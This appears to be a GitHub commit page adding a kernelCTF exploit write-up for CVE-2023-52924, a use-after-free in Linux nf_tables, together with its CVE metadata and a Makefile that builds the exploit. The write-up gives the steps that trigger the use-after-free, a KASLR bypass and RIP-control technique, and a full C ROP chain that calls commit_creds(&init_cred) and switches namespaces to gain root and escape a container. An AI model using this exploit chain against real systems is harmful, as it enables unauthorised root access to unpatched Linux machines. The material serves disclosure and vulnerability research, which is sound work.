Skip to content

Commit 07dd138

Browse files
author
Mingi Cho
committed
Add kernelCTF CVE-2023-52924_mitigation
1 parent 908d59b commit 07dd138

File tree

8 files changed

+1358
-0
lines changed

8 files changed

+1358
-0
lines changed
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,179 @@
1+
# Overview
2+
3+
There is an asymmetry between commit/abort and preparation phase if the following conditions are met:
4+
5+
1. set is a verdict map ("1.2.3.4 : jump foo")
6+
2. timeouts are enabled
7+
8+
In this case, following sequence is problematic:
9+
10+
1. element E in set S refers to chain C
11+
2. userspace requests removal of set S
12+
3. kernel does a set walk to decrement chain->use count for all elements from preparation phase
13+
4. kernel does another set walk to remove elements from the commit phase (or another walk to do a chain->use increment for all elements from abort phase)
14+
15+
If E has already expired in 1), it will be ignored during list walk, so its use count won't have been changed.
16+
17+
We can trigger a UAF from this vulnerability as follows. First, we create a victim set and a victim chain, and create an immediate expr that points to the victim chain; this expr will later hold the dangling pointer. At this point, the victim chain's reference count (`nft_chain->use`) is 1. Then, we add to the victim set a set element, configured with a short timeout, that points to the victim chain. Now, the reference count of the victim chain becomes 2. Next, we trigger the vulnerability by deleting the set twice. The first deletion decreases the reference count of the victim chain, and the second deletion aborts the first deletion but does not increase the reference count of the chain. Additionally, the addition of the set element is also aborted, which reduces the reference count of the chain again. The victim chain's reference count is now zero, so the chain can be freed. As a result, the immediate expr is left holding a dangling pointer to the freed victim chain.
18+
19+
# KASLR Bypass and Information Leak
20+
21+
We used a timing side channel attack to leak the kernel base, and created a fake ops in the non-randomized CPU entry area (CVE-2023-0597) without leaking the heap address.
22+
23+
# RIP Control
24+
25+
```c
26+
struct nft_chain {
27+
struct nft_rule_blob __rcu *blob_gen_0;
28+
struct nft_rule_blob __rcu *blob_gen_1;
29+
struct list_head rules;
30+
struct list_head list;
31+
struct rhlist_head rhlhead;
32+
struct nft_table *table;
33+
u64 handle;
34+
u32 use;
35+
u8 flags:5,
36+
bound:1,
37+
genmask:2;
38+
char *name;
39+
u16 udlen;
40+
u8 *udata;
41+
42+
/* Only used during control plane commit phase: */
43+
struct nft_rule_blob *blob_next;
44+
};
45+
```
46+
47+
When the vulnerability is triggered, the freed `chain->blob_gen_0` can be accessed via `immediate expr`. We leave the chain freed and spray an object to create a fake blob in `blob_gen_0`.
48+
49+
```c
50+
unsigned int
51+
nft_do_chain(struct nft_pktinfo *pkt, void *priv)
52+
{
53+
...
54+
do_chain:
55+
if (genbit)
56+
blob = rcu_dereference(chain->blob_gen_1);
57+
else
58+
blob = rcu_dereference(chain->blob_gen_0);
59+
60+
rule = (struct nft_rule_dp *)blob->data;
61+
last_rule = (void *)blob->data + blob->size;
62+
next_rule:
63+
regs.verdict.code = NFT_CONTINUE;
64+
for (; rule < last_rule; rule = nft_rule_next(rule)) {
65+
nft_rule_dp_for_each_expr(expr, last, rule) {
66+
if (expr->ops == &nft_cmp_fast_ops)
67+
nft_cmp_fast_eval(expr, &regs);
68+
else if (expr->ops == &nft_cmp16_fast_ops)
69+
nft_cmp16_fast_eval(expr, &regs);
70+
else if (expr->ops == &nft_bitwise_fast_ops)
71+
nft_bitwise_fast_eval(expr, &regs);
72+
else if (expr->ops != &nft_payload_fast_ops ||
73+
!nft_payload_fast_eval(expr, &regs, pkt))
74+
expr_call_ops_eval(expr, &regs, pkt);
75+
76+
if (regs.verdict.code != NFT_CONTINUE)
77+
break;
78+
}
79+
```
80+
81+
```c
82+
static void expr_call_ops_eval(const struct nft_expr *expr,
83+
struct nft_regs *regs,
84+
struct nft_pktinfo *pkt)
85+
{
86+
#ifdef CONFIG_RETPOLINE
87+
unsigned long e = (unsigned long)expr->ops->eval;
88+
#define X(e, fun) \
89+
do { if ((e) == (unsigned long)(fun)) \
90+
return fun(expr, regs, pkt); } while (0)
91+
92+
X(e, nft_payload_eval);
93+
X(e, nft_cmp_eval);
94+
X(e, nft_counter_eval);
95+
X(e, nft_meta_get_eval);
96+
X(e, nft_lookup_eval);
97+
X(e, nft_range_eval);
98+
X(e, nft_immediate_eval);
99+
X(e, nft_byteorder_eval);
100+
X(e, nft_dynset_eval);
101+
X(e, nft_rt_get_eval);
102+
X(e, nft_bitwise_eval);
103+
#undef X
104+
#endif /* CONFIG_RETPOLINE */
105+
expr->ops->eval(expr, regs, pkt);
106+
}
107+
```
108+
109+
`chain->blob_gen_0` is used in `nft_do_chain`, and `expr->ops->eval` is called to evaluate the expression in `expr_call_ops_eval`. We set the ops of the fake expr to the CPU entry area to control the RIP. We make the fake blob object larger than 0x2000 bytes so that it is allocated by the page allocator.
110+
111+
# Post-RIP
112+
113+
The ROP payload is stored in `chain->blob_gen_0`, which is allocated by the page allocator.
114+
115+
When `eval()` is called, `RBX` points to `chain->blob_gen_0+0x10`, which is the beginning of the `nft_expr` structure.
116+
117+
```c
118+
void rop_chain(uint64_t* data){
119+
int i = 0;
120+
121+
// nft_rule_blob.size > 0
122+
data[i++] = 0x100;
123+
// nft_rule_blob.dlen > 0
124+
data[i++] = 0x100;
125+
126+
// fake ops addr
127+
data[i++] = PAYLOAD_LOCATION(1) + offsetof(struct cpu_entry_area_payload, nft_expr_eval);
128+
129+
// current = find_task_by_vpid(getpid())
130+
data[i++] = kbase + POP_RDI_RET;
131+
data[i++] = getpid();
132+
data[i++] = kbase + FIND_TASK_BY_VPID;
133+
134+
// current += offsetof(struct task_struct, rcu_read_lock_nesting)
135+
data[i++] = kbase + POP_RSI_RET;
136+
data[i++] = RCU_READ_LOCK_NESTING_OFF;
137+
data[i++] = kbase + ADD_RAX_RSI_RET;
138+
139+
// current->rcu_read_lock_nesting = 0 (Bypass rcu protected section)
140+
data[i++] = kbase + POP_RCX_RET;
141+
data[i++] = 0;
142+
data[i++] = kbase + MOV_RAX_RCX_RET;
143+
144+
// Bypass "schedule while atomic": set oops_in_progress = 1
145+
data[i++] = kbase + POP_RDI_RET;
146+
data[i++] = 1;
147+
data[i++] = kbase + POP_RSI_RET;
148+
data[i++] = kbase + OOPS_IN_PROGRESS;
149+
data[i++] = kbase + MOV_RSI_RDI_RET;
150+
151+
// commit_creds(&init_cred)
152+
data[i++] = kbase + POP_RDI_RET;
153+
data[i++] = kbase + INIT_CRED;
154+
data[i++] = kbase + COMMIT_CREDS;
155+
156+
// find_task_by_vpid(1)
157+
data[i++] = kbase + POP_RDI_RET;
158+
data[i++] = 1;
159+
data[i++] = kbase + FIND_TASK_BY_VPID;
160+
161+
data[i++] = kbase + POP_RSI_RET;
162+
data[i++] = 0;
163+
164+
// switch_task_namespaces(find_task_by_vpid(1), &init_nsproxy)
165+
data[i++] = kbase + MOV_RDI_RAX_RET;
166+
data[i++] = kbase + POP_RSI_RET;
167+
data[i++] = kbase + INIT_NSPROXY;
168+
data[i++] = kbase + SWITCH_TASK_NAMESPACES;
169+
170+
data[i++] = kbase + SWAPGS_RESTORE_REGS_AND_RETURN_TO_USERMODE;
171+
data[i++] = 0;
172+
data[i++] = 0;
173+
data[i++] = _user_rip;
174+
data[i++] = _user_cs;
175+
data[i++] = _user_rflags;
176+
data[i++] = _user_sp;
177+
data[i++] = _user_ss;
178+
}
179+
```
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,12 @@
1+
- Requirements:
2+
- Capabilities: CAP_NET_ADMIN
3+
- Kernel configuration: CONFIG_NETFILTER, CONFIG_NF_TABLES
4+
- User namespaces required: Yes
5+
- Introduced by: https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=9d0982927e79 (netfilter: nft_hash: add support for timeouts)
6+
- Fixed by: https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=24138933b97b055d486e8064b4a1721702442a9b (netfilter: nf_tables: don't skip expired elements during walk)
7+
- Affected Version: v4.1 - v6.5
8+
- Affected Component: net/netfilter
9+
- Cause: Use-After-Free
10+
- Syscall to disable: disallow unprivileged user namespaces
11+
- URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-52924
12+
- Description: In the Linux kernel, the following vulnerability has been resolved: netfilter: nf_tables: don't skip expired elements during walk There is an asymmetry between commit/abort and preparation phase if the following conditions are met: 1. set is a verdict map ("1.2.3.4 : jump foo") 2. timeouts are enabled In this case, following sequence is problematic: 1. element E in set S refers to chain C 2. userspace requests removal of set S 3. kernel does a set walk to decrement chain->use count for all elements from preparation phase 4. kernel does another set walk to remove elements from the commit phase (or another walk to do a chain->use increment for all elements from abort phase) If E has already expired in 1), it will be ignored during list walk, so its use count won't have been changed. Then, when set is culled, ->destroy callback will zap the element via nf_tables_set_elem_destroy(), but this function is only safe for elements that have been deactivated earlier from the preparation phase: lack of earlier deactivate removes the element but leaks the chain use count, which results in a WARN splat when the chain gets removed later, plus a leak of the nft_chain structure. Update pipapo_get() not to skip expired elements, otherwise flush command reports bogus ENOENT errors.
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,35 @@
1+
LIBMNL_DIR = $(realpath ./)/libmnl_build
2+
LIBNFTNL_DIR = $(realpath ./)/libnftnl_build
3+
4+
exploit:
5+
gcc -o exploit exploit.c -L$(LIBNFTNL_DIR)/install/lib -L$(LIBMNL_DIR)/install/lib -lnftnl -lmnl -I$(LIBNFTNL_DIR)/libnftnl-1.2.5/include -I$(LIBMNL_DIR)/libmnl-1.0.5/include -static -s
6+
7+
prerequisites: libmnl-build libnftnl-build
8+
9+
libmnl-build : libmnl-download
10+
tar -C $(LIBMNL_DIR) -xvf $(LIBMNL_DIR)/libmnl-1.0.5.tar.bz2
11+
cd $(LIBMNL_DIR)/libmnl-1.0.5 && ./configure --enable-static --prefix=`realpath ../install`
12+
cd $(LIBMNL_DIR)/libmnl-1.0.5 && make
13+
cd $(LIBMNL_DIR)/libmnl-1.0.5 && make install
14+
15+
libnftnl-build : libmnl-build libnftnl-download
16+
tar -C $(LIBNFTNL_DIR) -xvf $(LIBNFTNL_DIR)/libnftnl-1.2.5.tar.xz
17+
cd $(LIBNFTNL_DIR)/libnftnl-1.2.5 && PKG_CONFIG_PATH=$(LIBMNL_DIR)/install/lib/pkgconfig ./configure --enable-static --prefix=`realpath ../install`
18+
cd $(LIBNFTNL_DIR)/libnftnl-1.2.5 && C_INCLUDE_PATH=$(C_INCLUDE_PATH):$(LIBMNL_DIR)/install/include LD_LIBRARY_PATH=$(LD_LIBRARY_PATH):$(LIBMNL_DIR)/install/lib make
19+
cd $(LIBNFTNL_DIR)/libnftnl-1.2.5 && make install
20+
21+
libmnl-download :
22+
mkdir $(LIBMNL_DIR)
23+
wget -P $(LIBMNL_DIR) https://netfilter.org/projects/libmnl/files/libmnl-1.0.5.tar.bz2
24+
25+
libnftnl-download :
26+
mkdir $(LIBNFTNL_DIR)
27+
wget -P $(LIBNFTNL_DIR) https://netfilter.org/projects/libnftnl/files/libnftnl-1.2.5.tar.xz
28+
29+
run:
30+
./exploit
31+
32+
clean:
33+
rm -rf $(LIBMNL_DIR)
34+
rm -rf $(LIBNFTNL_DIR)
35+
rm -f exploit

0 commit comments

Comments
 (0)